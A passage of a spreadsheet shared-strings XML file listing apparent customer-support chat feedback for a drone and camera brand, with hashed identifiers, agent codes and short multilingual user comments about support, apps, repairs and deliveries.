  </si>
  <si>
    <t>+4pkWjw5Tju84cPmXWYT2A==</t>
  </si>
  <si>
    <t>Bad</t>
  </si>
  <si>
    <t>v7t3+hFInvDlB8Or1wpusW0hxWbGJGM/Qh5HLb6B7es=</t>
  </si>
  <si>
    <t>75a750d169a6b68cadcf0d9f45ea2270</t>
  </si>
  <si>
    <t>|82622289366775785356197</t>
  </si>
  <si>
    <t>HNlKpVRype0/eH+847tkkg==</t>
  </si>
  <si>
    <t>Ok</t>
  </si>
  <si>
    <t>dzrU98Pub5ZjwxPP2xSpEI1IOKuoNwZUrpKhI00piyQ=</t>
  </si>
  <si>
    <t>c7dcbec9c2cd27621347ca3fc93b5d52</t>
  </si>
  <si>
    <t>fb_mimo1</t>
  </si>
  <si>
    <t>|82622987275064315019279</t>
  </si>
  <si>
    <t>HzlJ/cCLA5KHkehwzgiz7NfXh0C39/qO2j2kjzbuwuM=</t>
  </si>
  <si>
    <t xml:space="preserve">Knowing that an Osmo Action 5 Pro is a camera and not a drone would be a start </t>
  </si>
  <si>
    <t>ZQg/t99k8gVJaNHQhHCywhotrgPuMJ2ZCcY2pp5xO08=</t>
  </si>
  <si>
    <t>210d6d629eb9035d521c2680f54e2856</t>
  </si>
  <si>
    <t>|82621752310813908892798</t>
  </si>
  <si>
    <t>7Ueegz8youglGdPSnFKTS6E0+Yp0pxdBEnGWxicew9JojqqQrjkYm7goaGjpNMjk</t>
  </si>
  <si>
    <t xml:space="preserve">No answers given. 
Need to talk to a live consultant. </t>
  </si>
  <si>
    <t>m6u55WpIUKydKY8enmT98shxaEh73HU5LWWmKePSSn8=</t>
  </si>
  <si>
    <t>6fd70ea4df835aa86c69bf643f2a8bd9</t>
  </si>
  <si>
    <t>|82621017813894846545363</t>
  </si>
  <si>
    <t>/ancCwJ5YnyxlYSmIqiMRA==</t>
  </si>
  <si>
    <t>Hi,
i downloaded the dji fly app on my samsung galaxy A 13 but it says it can't install the file. W</t>
  </si>
  <si>
    <t>UpBLq3VWx8i6rd0ks4ZYuP5yDK4kHC8OQ/kzORopXRs=</t>
  </si>
  <si>
    <t>f8d830869c17e4e74a932f61428662bd</t>
  </si>
  <si>
    <t>|82621129154085671068722</t>
  </si>
  <si>
    <t>TpNDwVtfxaFeeRnZaiTNYlueyib0CfG8itDvMfIeO+g=</t>
  </si>
  <si>
    <t xml:space="preserve">Very poor ,I can't get any information </t>
  </si>
  <si>
    <t>cKgPrUDnsjvsFAhwDnEFA2DLgnbHZdTtrQwXSfFRNPQ=</t>
  </si>
  <si>
    <t>c5e2a47217fcbf55a157176f10d873ad</t>
  </si>
  <si>
    <t>|82620342677995896689383</t>
  </si>
  <si>
    <t>u85OireLlR61FwHsw8OAexQzSQXq9LphC/eTbLELFJ0=</t>
  </si>
  <si>
    <t>No reply</t>
  </si>
  <si>
    <t>Va//fsdsmViDQHwoluPSU28Nv3KItLyIcDpZlU1dBUY=</t>
  </si>
  <si>
    <t>6590eee9d1473aa4f258397ae6bf308e</t>
  </si>
  <si>
    <t>eu_sp28</t>
  </si>
  <si>
    <t>|82620138569769627019898</t>
  </si>
  <si>
    <t>QPlVIOyu5XoSiKBlxnqRIw==</t>
  </si>
  <si>
    <t>BEST</t>
  </si>
  <si>
    <t>xyNWW2jyPee8k5QDOtdUTVnhCiORv+UzPKzmYwmbaa8=</t>
  </si>
  <si>
    <t>f012a984362e82e7f9ef9051828ab218</t>
  </si>
  <si>
    <t>|82620479073701791547849</t>
  </si>
  <si>
    <t>mRrw04Zt1QizwIkdEWt8VDYleRNYeNq0VyPQlohC6gY=</t>
  </si>
  <si>
    <t xml:space="preserve">They don't answer my questions or try to communicate. I want to return the product and they send me </t>
  </si>
  <si>
    <t>CJwC5ac6m9N+zArvFgjBL8UNHlMyX8D4AHVPBHFlC90=</t>
  </si>
  <si>
    <t>6c5a687fc8db50a7acbc8dd14a02eda7</t>
  </si>
  <si>
    <t>|82620011465515181464079</t>
  </si>
  <si>
    <t>m+1vyZj+xeZGjJnJ56ZLSycU70QeKkUYTgUbTUC+/K4=</t>
  </si>
  <si>
    <t>Problem wurde nicht gelöst</t>
  </si>
  <si>
    <t>nGVFsaoVytAJZbkHLx8hWeTd/zkNHr+FCCUCdxA8xtI=</t>
  </si>
  <si>
    <t>424ff41975d52795b1117888835256ad</t>
  </si>
  <si>
    <t>|82619998791054854495750</t>
  </si>
  <si>
    <t>ECj0YoDwLSH1dvVbz6g0R6iqglNNXFBXfLMeiXyD3wU=</t>
  </si>
  <si>
    <t xml:space="preserve">échanges et conseils personnalisés :) </t>
  </si>
  <si>
    <t>v5Akje9zVIBAa2eVBbdC6c+DnutAClMWJSLkWdsZ4Io=</t>
  </si>
  <si>
    <t>0ab6cbe68cab16cfb6fd7b5cab44d821</t>
  </si>
  <si>
    <t>|82619084071216144419587</t>
  </si>
  <si>
    <t>eGTFrDyRt56bcyf/C0rQp1NRGQLgORnc60+lqE/I89A=</t>
  </si>
  <si>
    <t>bad</t>
  </si>
  <si>
    <t>akFTtdzp9YLFhliJPD3MoPvoWgZgPAy6jARAoElNS0Y=</t>
  </si>
  <si>
    <t>111d9526923f7217624a9a0f3c77bacd</t>
  </si>
  <si>
    <t>|82618889186282831917935</t>
  </si>
  <si>
    <t>DaiwAT0oryqtlhyiDOn5OzZ26uHyVYY10+NqWmuvZCg=</t>
  </si>
  <si>
    <t>I love this brand. If u need help with anything for drones this is they way to go!!</t>
  </si>
  <si>
    <t>tT2B1+8K9uTpGTiKyJHhdNA33KmUtAdpHThH6JKm+T0=</t>
  </si>
  <si>
    <t>b92a34852cecfbb9fc41801c5a690104</t>
  </si>
  <si>
    <t>|82619426448336725396835</t>
  </si>
  <si>
    <t>3KfnD1zxE/LUPKP6UvDXgaXgdlYlFyuZW1XnQQQ3Mk0=</t>
  </si>
  <si>
    <t>Hi i</t>
  </si>
  <si>
    <t>61J2B5kVGHZqWITbIS6NCgY2MqUwVX5EQaXxN/nb6Po=</t>
  </si>
  <si>
    <t>f5b9ec29e3fed2a2d89bcc14e7946145</t>
  </si>
  <si>
    <t>|82618187184227181135934</t>
  </si>
  <si>
    <t>km3OgErlsK/jJFx+mJO6Wnd02alfXjOTzcHbjbnMPWs=</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, is there a difference in the range distance between the RC 2 remote control and the RC N2 in </t>
  </si>
  <si>
    <t>kJkWiBNcghg1Cb3ToCn81ysJyD4J2vjoi6ewSPCctbc=</t>
  </si>
  <si>
    <t>a76418e63bfd8f54d3124727eeec39dd</t>
  </si>
  <si>
    <t>|82618717838861086918052</t>
  </si>
  <si>
    <t>/opSDyQOAfm2IyuVqFmHsUNM72wcOYp+a9NCA8XOiNs=</t>
  </si>
  <si>
    <t>unable to connect.newish phone samsung s22</t>
  </si>
  <si>
    <t>YjD4SMWMev33rrW5zsxfZXhdxq8+8eKXUwhKom7T5mo=</t>
  </si>
  <si>
    <t>f4f922003282e29c59fdb9d8edf82c24</t>
  </si>
  <si>
    <t>|82618045286974649119415</t>
  </si>
  <si>
    <t>oJc3LaROwH6Ko5bkc8Ll5za4xFih1MGEw1ALhVxXasPvu6w+KQl1jb2tMX1pZZpX</t>
  </si>
  <si>
    <t xml:space="preserve">This whole experience is unforeseen I have never ordered a product and not receive the product </t>
  </si>
  <si>
    <t>+XhumtMQHvhBRUUnkcdp6gdRGLCO+My6NCYZdr+fE6c=</t>
  </si>
  <si>
    <t>cfffeda9cffe98ba17fd979aa84ee4a1</t>
  </si>
  <si>
    <t>|82618281853919103385448</t>
  </si>
  <si>
    <t>访客-380030</t>
  </si>
  <si>
    <t>Bonjour, est-ce que le dji mic mini peut se brancher sur la RC2 mini 4 pro et de quelle façon.Merci</t>
  </si>
  <si>
    <t>4562ecc75609fc4b2c388c6597174bcf</t>
  </si>
  <si>
    <t>8d992e4b494014197a74de69fde24ac6</t>
  </si>
  <si>
    <t>|82617596686865321235289</t>
  </si>
  <si>
    <t>V3j1WVOHNuJTsjX8V2f/zf+kIoLQqKHAUPHPoQAbi/s=</t>
  </si>
  <si>
    <t>Timed out too quickly.</t>
  </si>
  <si>
    <t>hlQ6xUjVRLPxtqq82+FQBB7f636ZErzIWw+NT7RTZ/A=</t>
  </si>
  <si>
    <t>95e825421a28cca92003499ae8fc096c</t>
  </si>
  <si>
    <t>|82617576954664807081728</t>
  </si>
  <si>
    <t>访客-a63b35</t>
  </si>
  <si>
    <t>Nul</t>
  </si>
  <si>
    <t>b006f268ae4665437e68de7e8228046a</t>
  </si>
  <si>
    <t>8fe6190d2968b76e3db58102cb1aa1e8</t>
  </si>
  <si>
    <t>|82617505224976025342132</t>
  </si>
  <si>
    <t>TUvptwX+LK+tlxoJ6ak3Uw==</t>
  </si>
  <si>
    <t xml:space="preserve">Change shipping/billing information on recent repair </t>
  </si>
  <si>
    <t>Mk3lfkl4QPAdZyNfIori0IZf8G9WBmc/AIzkIl4M+WI=</t>
  </si>
  <si>
    <t>1dd4c6417c601624b08b3d932a3a4dd8</t>
  </si>
  <si>
    <t>|82617227921529272364448</t>
  </si>
  <si>
    <t>PzYN4LcVhVFmKuxrXceKbejW4YFK1BKKdP+mOh+1W14=</t>
  </si>
  <si>
    <t xml:space="preserve">Hi i have my how do i register it please
 </t>
  </si>
  <si>
    <t>by0+3bMy5WRePnLjUCq7dRzfLiqx0JfRl4ivlCqhZaw=</t>
  </si>
  <si>
    <t>d6cf6053d96d914731a4c6b2ac838b29</t>
  </si>
  <si>
    <t>|82617042886096595133307</t>
  </si>
  <si>
    <t>K9mHrP7t211rXdbPaiXun74XiA3Yw8tKh+GalEd3uto=</t>
  </si>
  <si>
    <t>I want to speak to a person</t>
  </si>
  <si>
    <t>nyeL8CU/fSoMI9YxvrIlZ5BbQip36lfpCRZcLnLLri8=</t>
  </si>
  <si>
    <t>a6cf770e307cd57410c01b31e4f67cc4</t>
  </si>
  <si>
    <t>|82617612132138601698157</t>
  </si>
  <si>
    <t>Fbfw4eXMTBp/Wj/MLabFkhUys2EWXdl2vup7DW6xrhxtHQgSavcW6uznuyhyK6uT</t>
  </si>
  <si>
    <t>Perchè dopo 3 giorni l'osmo pocket non è partito ancora?</t>
  </si>
  <si>
    <t>/NSrWO8d6oRukTiMNT0b1zoJkNIzOHdow8oUiSVQ/g8=</t>
  </si>
  <si>
    <t>a4dff38d9d11bff82c92bd4fb19724a2</t>
  </si>
  <si>
    <t>|82616883811944677740866</t>
  </si>
  <si>
    <t>sIfVbDBWI+Nxwsl+ZDB8Lw==</t>
  </si>
  <si>
    <t>Zero stars. Zero support. Worst kind of customer support.</t>
  </si>
  <si>
    <t>WDxaOor42Pg6GwKH7iFkpmlFRzegADF8gUsfuu4aCGI=</t>
  </si>
  <si>
    <t>46337fe0cb9c86e4f98e270cd73cadcd</t>
  </si>
  <si>
    <t>|82616930132401201856248</t>
  </si>
  <si>
    <t>2NkQVF0EmSP5jcnRHH2hi/6UDjaQpIm+RyBhhPAE8jM=</t>
  </si>
  <si>
    <t>Very difficult to understand the rep</t>
  </si>
  <si>
    <t>C6sCXZROggw3/Eoyu+S4z9PiCzUIlvtdN2UfoHFYm1g=</t>
  </si>
  <si>
    <t>4813d2870fc1e887b8a36ea44be26f25</t>
  </si>
  <si>
    <t>|82616495600308177861379</t>
  </si>
  <si>
    <t>访客-56afbf</t>
  </si>
  <si>
    <t xml:space="preserve">Ich habe leider keinen aktivierungscode gefunden </t>
  </si>
  <si>
    <t>bf30c7b470427043af889683ddd2b0b5</t>
  </si>
  <si>
    <t>0d1af57b3b3d61904af8f540adfe1415</t>
  </si>
  <si>
    <t>|82614053407216890870160</t>
  </si>
  <si>
    <t>PWEz2uGpYFMzMb9IUsvhfFGfZADgkgurfIrO58+YEMI=</t>
  </si>
  <si>
    <t>I was typing and you cut the chat. my rating of this chat is 1</t>
  </si>
  <si>
    <t>pmb1bViq3GuSNBFRlla+aqb9SG9mdG2bS2WE636/lqo=</t>
  </si>
  <si>
    <t>87a78bfe783281be9f62fde175cd128b</t>
  </si>
  <si>
    <t>|82613968406033783510557</t>
  </si>
  <si>
    <t>0PNemQTRDtfB2bTH2aEhyxhFM3Bv940W/T7RxZXD4eA=</t>
  </si>
  <si>
    <t>No help whatsoever- waste of both time and energy- you suck for making me go through this also.</t>
  </si>
  <si>
    <t>gfNW7ZMjd71e06myzY8G3tM/TEauAdzioYwaK4/SSog=</t>
  </si>
  <si>
    <t>ff01f7156dccc34c86af87beed221bf1</t>
  </si>
  <si>
    <t>|82613165688431470090552</t>
  </si>
  <si>
    <t>9vaS1HAmQ2ekRF2BMXJW8PufpBk5y6fZfMYTXI91lsI=</t>
  </si>
  <si>
    <t>simple process to complete.</t>
  </si>
  <si>
    <t>S2EnWnz7STyPJ3tDkKUFfgvyCGcy65QA2ij9osHPE4w=</t>
  </si>
  <si>
    <t>c4f2f321efe4ca4b9d2d3069ce10e6a2</t>
  </si>
  <si>
    <t>|82613053424797195054725</t>
  </si>
  <si>
    <t>yG8Vfv9DQShFzvNFE4lAv25bjsxavRQfZlDKtfIfCFw=</t>
  </si>
  <si>
    <t xml:space="preserve"> ok</t>
  </si>
  <si>
    <t>r/CFSW9x7lAyI5iZ8onRBdlxNpgjs7L/hHvdmgtALSg=</t>
  </si>
  <si>
    <t>a50f934c1bdb0f3dd355fea3b89b44af</t>
  </si>
  <si>
    <t>|82612931321838251222818</t>
  </si>
  <si>
    <t>0fvn8aNhjrP9V6TV9RLRY5Np030A9c9j/4ZiwIq5n2k=</t>
  </si>
  <si>
    <t>If I lose a drone, do I need to buy just a new drone or do I need a drone and controller? Thank You.</t>
  </si>
  <si>
    <t>s6QOJ+Voq5C77mMyKLxhVnte/bN336sAXO8v1nC2g4M=</t>
  </si>
  <si>
    <t>f8bec055dd48c3a752cb7400f92f9ef5</t>
  </si>
  <si>
    <t>|82613338844471621971982</t>
  </si>
  <si>
    <t>N8mtYYNnGMGTHm+TBk0n/EiIcWGF6k/XiN/e3FsKTC8=</t>
  </si>
  <si>
    <t>Buy a dji air2s second hand dron , and change the remote control, how to bind a new remote control</t>
  </si>
  <si>
    <t>OW97Om2spY/hLVBcT38zZi0UOPWUAC7WwK5wN9/s2K8=</t>
  </si>
  <si>
    <t>1b6d2813ef90fd3e70e872fc0ca18c35</t>
  </si>
  <si>
    <t>kr_sp3</t>
  </si>
  <si>
    <t>|82614184489962406170284</t>
  </si>
  <si>
    <t>yqLfUCIT5yoRpkACZ7LTvw==</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>실수로계정삭제됐다면</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>다시</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="微软雅黑"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="汉仪书宋二KW"/>
        <charset val="134"/>
      </rPr>
      <t>복구가능한가요</t>
    </r>
  </si>
  <si>
    <t>eX25t5phpUj/OZHpTeQyqv3H0F7x9z8KU3B1QjosBjk=</t>
  </si>
  <si>
    <t>5dda103155095175fcfbedf2e64ff7a7</t>
  </si>
  <si>
    <t>|82613132109604688333210</t>
  </si>
  <si>
    <t>v5KrlFYZ+voDU5BJTzx1SFpOTZaFqeFmgH1wPhErOyA=</t>
  </si>
  <si>
    <t>I can't not download the app</t>
  </si>
  <si>
    <t>zMDxy4/xeS5FkD8PFfVr9AwLo84FEgCnHGyzWz2VLp0=</t>
  </si>
  <si>
    <t>db2c03679ceef2a320dfdfbb02905143</t>
  </si>
  <si>
    <t>|82612207699881938684845</t>
  </si>
  <si>
    <t>If I lose a drone do I need a new drone and controler or just a new drone</t>
  </si>
  <si>
    <t>040996e454fc17388d5a27616b2990ec</t>
  </si>
  <si>
    <t>|82612513920321801581596</t>
  </si>
  <si>
    <t>J0Yivfa6shO4ONjnpvO3k3w9RnxMaoyulCgia9AqOn0=</t>
  </si>
  <si>
    <t>No reply!</t>
  </si>
  <si>
    <t>tqVMD2NeW8WWdaam50g2bmdDRfiU6xZYsq76YhDh0PE=</t>
  </si>
  <si>
    <t>5032a85ffd2537e88f236f2cd83a174c</t>
  </si>
  <si>
    <t>|82612347702246664687310</t>
  </si>
  <si>
    <t>v7tzFe2tW3EReYG+DLUa2w==</t>
  </si>
  <si>
    <t>CAS-19928747-B2F9L1 returned to me with the USB-C port door missing. But the repair was very good, w</t>
  </si>
  <si>
    <t>i7NAnUtyp2quIGlNWtsduzB7fP+R/feEUhe0F3zPx4k=</t>
  </si>
  <si>
    <t>6067f80ada236797590628a1da054ae4</t>
  </si>
  <si>
    <t>|82611519908446389068193</t>
  </si>
  <si>
    <t>VtTUBxsDCDHYSZLDFa3mKg==</t>
  </si>
  <si>
    <t>Bestellung 0492454784106, es fehlt die Kamera bei der Lieferung! Wann kommt die osmo Pocket 3?</t>
  </si>
  <si>
    <t>yigRQxFlh9i30ebNXBE1LirIEkjpCyzisOXAMrT/u8I=</t>
  </si>
  <si>
    <t>1880f76af038d057afee39fce1bfc2a5</t>
  </si>
  <si>
    <t>|82611492661415657567322</t>
  </si>
  <si>
    <t>bYWhI1jbri0rUbl2hvGZ04pC5KoozxCNsqom0PfyGp8=</t>
  </si>
  <si>
    <t>Ne répond pas à la question</t>
  </si>
  <si>
    <t>FZfI8aOj1ccjr2jG1sy/Olw9462kIe9S0I6dQrrD1VY=</t>
  </si>
  <si>
    <t>63a6c0bb7647e73ff082b83785d03531</t>
  </si>
  <si>
    <t>|82611647587729086564805</t>
  </si>
  <si>
    <t>访客-93c13b</t>
  </si>
  <si>
    <t xml:space="preserve">Slava makes a perfect Job , thanks a lot </t>
  </si>
  <si>
    <t>f86eb8dc4706774da7e937a060288d13</t>
  </si>
  <si>
    <t>7d9ab9f227ea8b42ed41b0ef682a46e0</t>
  </si>
  <si>
    <t>|82611079003046243037698</t>
  </si>
  <si>
    <t>VvOlfOvSnz66kihMyWxzTg==</t>
  </si>
  <si>
    <t>I don't speak the language spoken to me. Probably not your fault.</t>
  </si>
  <si>
    <t>Qs92RkltFHH0KRWYH3c1dUc4edX7rKCC+l1NqwdSjGQ=</t>
  </si>
  <si>
    <t>7787f67c7e4ec4f0fe5e20b7639141d8</t>
  </si>
  <si>
    <t>|82610688643869043244942</t>
  </si>
  <si>
    <t>Eugp0xi3Ukt2fJJGmWoTQZBnmugyz7kMnpGBvzucmi8=</t>
  </si>
  <si>
    <t xml:space="preserve">Es hat nicht geklappt. </t>
  </si>
  <si>
    <t>JIOMx9cT9RYDlmLx8lo5jNDD9mRZysghDER4iEAcc6Q=</t>
  </si>
  <si>
    <t>2176ed3d556f8cb960de4f0df576631f</t>
  </si>
  <si>
    <t>|82607840482769951850533</t>
  </si>
  <si>
    <t>b6V6JCD1sYNIgx3SbD6ffFKLKkoeeKjA2teVYAtSkcY=</t>
  </si>
  <si>
    <t xml:space="preserve">Procédure de changement très simple </t>
  </si>
  <si>
    <t>/WfmGjnZC9XLFA0+1AtvTusszZZfyPqMhwuTvDMMsC0=</t>
  </si>
  <si>
    <t>afeb876e9990695d7737cb7b5e7e0a60</t>
  </si>
  <si>
    <t>|82607060657332806714596</t>
  </si>
  <si>
    <t>AwovHjA7oe0VmQzPBo3VpMIElP/1RLhh2Ixp27Z+Utc=</t>
  </si>
  <si>
    <t>I need help completing my repair request</t>
  </si>
  <si>
    <t>0iTvIPhtziTxcPkx9GM1blqwZpx8c7lV4XHACUEdNu0=</t>
  </si>
  <si>
    <t>a93040f98a4b0d7aebfb819232652b4b</t>
  </si>
  <si>
    <t>|82607115291713191153355</t>
  </si>
  <si>
    <t>4QWLqPuA+r/twbmyOgZH5g==</t>
  </si>
  <si>
    <t>It just sent me around in circles and kept cancelling my chat thread. What a joke.</t>
  </si>
  <si>
    <t>on/oe8tK7vCqigx9QYAV9A==</t>
  </si>
  <si>
    <t>dc319eafbb3f076612db4e6389bca775</t>
  </si>
  <si>
    <t>|82607330221981063452716</t>
  </si>
  <si>
    <t>u/ev+gPgcrPrFlc/WmKmcD+UtZg3iMlJh9Nv+0Tgmzy3s1sGoJbP1cX1289JEPse</t>
  </si>
  <si>
    <t xml:space="preserve">J’ai acheter une nouvelle télécommande pour mon drone mais je n’arrive pas à la connecter 
</t>
  </si>
  <si>
    <t>A1jl5Wdzt8J4M1iiY6HICL9eK2JPFOQBRdpNWMWGOHM=</t>
  </si>
  <si>
    <t>02bd643356202a3d73184e5738544e41</t>
  </si>
  <si>
    <t>|82606134074382395045541</t>
  </si>
  <si>
    <t>5/8Mi7FiPN81pWnOn2uF36tCjomV3TdfWOXdO+qH7/I=</t>
  </si>
  <si>
    <t>had the correct address of a document I needed.</t>
  </si>
  <si>
    <t>0UoRsjpwgbNceYusiYTfLDRWAEZ8zuR1zagXuwiRWAE=</t>
  </si>
  <si>
    <t>c6074fff0a1b100877c0b08234700408</t>
  </si>
  <si>
    <t>|82604717701916174677291</t>
  </si>
  <si>
    <t>+DeTmBWxbfjLbfKV9UkVOg==</t>
  </si>
  <si>
    <t>Hallo! Ich hab eine Austauschdrohne mit einer neuen Seriennummer; muss ich sie neu registrieren?</t>
  </si>
  <si>
    <t>3qp9ZQxv1ddqnNC4uJs0kB61z7b+hYZrhXmm9mZylEA=</t>
  </si>
  <si>
    <t>3517667c22e789b2fdb4ca404ef68617</t>
  </si>
  <si>
    <t>|82604553980541626958236</t>
  </si>
  <si>
    <t>vQkUCWn4ZM+ZJKMOJLw5UuUYMEIYhaD+52LZG26XWlY=</t>
  </si>
  <si>
    <t>No help at all. Was told the same lie as 2 weeks ago, I would hear back in 24-48 hours, but nothing</t>
  </si>
  <si>
    <t>/tzfZSgfanB6qLaFtd/ByBmM6nUwQWXPrY2OKF7Bl5I=</t>
  </si>
  <si>
    <t>f0fe02170ccbaa96c885884c163d7495</t>
  </si>
  <si>
    <t>|82603416651314625697231</t>
  </si>
  <si>
    <t>YA+tcL8+NT0I9y+86COVMPNZyWC5SjUJ5Z1ZE7t0kAo=</t>
  </si>
  <si>
    <t>Return a message. Appreciate you may all be busy. Cheers</t>
  </si>
  <si>
    <t>IPh+dskEdvKifeWwI+yLtg==</t>
  </si>
  <si>
    <t>22dbd8274b7c12af279bd6fd5a6be84a</t>
  </si>
  <si>
    <t>|82603003015538804947828</t>
  </si>
  <si>
    <t>EdLWhiF1tkrM4I5yLL4OEa11ohO8GNeKWrkmLDXvexQ=</t>
  </si>
  <si>
    <t>you make a timeout as a person is writing a response... I know the Gen ZY con only think is CHM byte</t>
  </si>
  <si>
    <t>OJ7aZsQWLGVLdGPsgAPNAuoGZXVJRXn8bwog8Ej4gco=</t>
  </si>
  <si>
    <t>9f88a9d0ac2066e50182b40466426d5f</t>
  </si>
  <si>
    <t>|82602824679997934688314</t>
  </si>
  <si>
    <t>访客-680e67</t>
  </si>
  <si>
    <t xml:space="preserve">Du néant, du vide, de la perte de temps, ce site n'a aucune valeur d'aide  </t>
  </si>
  <si>
    <t>ce21e3fb9cd8094c2d389c07e06b4c30</t>
  </si>
  <si>
    <t>323d55bc02c000c65e30ad1946acc0e5</t>
  </si>
  <si>
    <t>|82603266498242045587413</t>
  </si>
  <si>
    <t>ISdnsd6vwn7MClakqCt3BeqLE04SKnZWWz+b8BDwKpM=</t>
  </si>
  <si>
    <t>todo muy bueno y sin entender ingles jajajaj</t>
  </si>
  <si>
    <t>bV/tNVklHjDVzy17D780LNKhqVo+d0eZnYQUVoPAoKA=</t>
  </si>
  <si>
    <t>6a91b6f9a23ecd9d59a835b941717e7c</t>
  </si>
  <si>
    <t>it_sp1</t>
  </si>
  <si>
    <t>|82602094699163628448008</t>
  </si>
  <si>
    <t>Cr11eFqWqOxWqUtm5/CHxqlNQhD9lFxyb9GkPhUWf6Y=</t>
  </si>
  <si>
    <t xml:space="preserve">Non riesco più a parlare con un operatore che mi aiuti </t>
  </si>
  <si>
    <t>S4HBVkYvAGg+P7gXlVKB9gqalJdngoPxo6gFl45WEcA=</t>
  </si>
  <si>
    <t>dc317683889cfd8eaf4c352a189b70be</t>
  </si>
  <si>
    <t>|82602938402579256714183</t>
  </si>
  <si>
    <t>+qJAnPjql5pL5wRwxpmReXoJahwdkVU6gIy0qxO6BsU=</t>
  </si>
  <si>
    <t>Horrible shipping time. Inaccurate product stock</t>
  </si>
  <si>
    <t>8jC6e2cMX5wnUDP+b9N4jDiLHogl6if63hfPh8/qplY=</t>
  </si>
  <si>
    <t>d281f652d4ed58372ee45087c1d6be3f</t>
  </si>
  <si>
    <t>|82601975533978974170758</t>
  </si>
  <si>
    <t>GGmqhvb/Y+8oOMYDkJXq5OCRbvj2pykmueIB4/oYtc4=</t>
  </si>
  <si>
    <t>I dint get answer</t>
  </si>
  <si>
    <t>yNmHMCjyBxNj3ZoZ19hQmyFqliYLPF4PXSSKXL+onSU=</t>
  </si>
  <si>
    <t>6f969f902af389fd6e978847f1dd152a</t>
  </si>
  <si>
    <t>eu_sp16</t>
  </si>
  <si>
    <t>|82600008152794383562138</t>
  </si>
  <si>
    <t>9T/qCNM3KxEl7DYwbWUDwJg0Mr9vtYtrL+MnBBi0Wmg31bxisyTWaBDl/A1bQY+y</t>
  </si>
  <si>
    <t>There is no support for account issues</t>
  </si>
  <si>
    <t>pJ2q8KYv+cy2c9Bg4fPeYftN3dCIXseRwYDkxyYRUrI=</t>
  </si>
  <si>
    <t>7851c55ee5be6519eb872b72b81e4060</t>
  </si>
  <si>
    <t>|82601547580637742971667</t>
  </si>
  <si>
    <t>94jP269XnaWgG/Ri9+rpug==</t>
  </si>
  <si>
    <t>Very knowledgeable and courteous excellent customer service</t>
  </si>
  <si>
    <t>+b+gZbo6zoXpd2GETbt5NpbKC/xsOsxh95eTAFoB18Y=</t>
  </si>
  <si>
    <t>fb15e69275c560e116babca1c753ad4d</t>
  </si>
  <si>
    <t>|82600387887158908059521</t>
  </si>
  <si>
    <t>nQvnhDXVx9U2NWhHZFm4Ng==</t>
  </si>
  <si>
    <t>action 2 camera built in battery is it available?</t>
  </si>
  <si>
    <t>6V7jQ26Ljt0NmnDRVEHmVn8gTg0LEfM38RouLrtLX/U=</t>
  </si>
  <si>
    <t>ab388c346a8617b3dd5af7d4943393b4</t>
  </si>
  <si>
    <t>|82599965477656346570936</t>
  </si>
  <si>
    <t>FqHM+nKH9T9b9Lt0TVku6dMYrgG4hEPCGUK3BNITs6I=</t>
  </si>
  <si>
    <t>Le service client doit tenir ses promesses et éviter de donner des informations fausses ou trompeuse</t>
  </si>
  <si>
    <t>bj5TbBcofTsuyrBd6dc9tMg/Ot+m03e+29Gqcltu4O0=</t>
  </si>
  <si>
    <t>415b45338f2d140711a4dacdbf89f675</t>
  </si>
  <si>
    <t>|82599861730934548362751</t>
  </si>
  <si>
    <t>F9Pd3Rq8znfPvI2BAT5CGg==</t>
  </si>
  <si>
    <t>Simple, efficient and effective</t>
  </si>
  <si>
    <t>qh2wD+8rOyA3uHeEFU8Uxp3JXqe/g3JNJlK3yJ+/ubU=</t>
  </si>
  <si>
    <t>ec761b696c1c5d56a26266275205e201</t>
  </si>
  <si>
    <t>|82599619493081102714736</t>
  </si>
  <si>
    <t>pJVsTXefSgm8oL2TF/VBVU9/2GYsK/bfipgYFJPHX2I=</t>
  </si>
  <si>
    <t>i AM WAITING FOR THE RETURN LABLE IN MY EMAIL</t>
  </si>
  <si>
    <t>uWxilJlJnDGFypo4aP72zuObetAu4bJogKZMqavIC+k=</t>
  </si>
  <si>
    <t>c41d1878fd6a5348465b5195d0d28429</t>
  </si>
  <si>
    <t>|82599712069322326770706</t>
  </si>
  <si>
    <t>PzLb23J/wmHf5H60Ab6XLdnx7KcdBjXO8mhkK2NobmQ=</t>
  </si>
  <si>
    <t>Please unlock my neo drone .says it's fly away .but it's not. I never lost it and it's right hear.</t>
  </si>
  <si>
    <t>RgotAJeC1/0I+9Xh6YiVBQPEI0kaanm5pbubdaEZEnU=</t>
  </si>
  <si>
    <t>9adb69e8e0fdf9d8dd38f1d9c2b7d216</t>
  </si>
  <si>
    <t>|82600130510627126249772</t>
  </si>
  <si>
    <t>Cureaw7PNwIDSUMyZnr/AA==</t>
  </si>
  <si>
    <t>Confusing</t>
  </si>
  <si>
    <t>UPuwRt4t0jbCMQ/ykWSU1Azg8TghG8FVwQObg4JrEWs=</t>
  </si>
  <si>
    <t>dd5607138d0c272fd8a00350a5d727be</t>
  </si>
  <si>
    <t>|82596802191237429335758</t>
  </si>
  <si>
    <t>QI55M0V2qxYpzyksAalEIUllhDLgwBbV3LJ1g+SEpdQ=</t>
  </si>
  <si>
    <t>I asked a question, got no answer and then the chat was closed because of no messages.</t>
  </si>
  <si>
    <t>AGHxm8Jk7B2AK+9sWs2bQQJgRKhdlQCV7w17hO4Zmpk=</t>
  </si>
  <si>
    <t>8d3f36794d45d78717f017a6917914c8</t>
  </si>
  <si>
    <t>|82596852994716963678175</t>
  </si>
  <si>
    <t>访客-4f0280</t>
  </si>
  <si>
    <t xml:space="preserve">je n ai pas obtenu de réponse a ma quesiton 
</t>
  </si>
  <si>
    <t>883f89980c5fbf4d61088a2ca18d1d20</t>
  </si>
  <si>
    <t>d1440218c1a9ba97c9ee1d29fe73e614</t>
  </si>
  <si>
    <t>|82596107791726684166858</t>
  </si>
  <si>
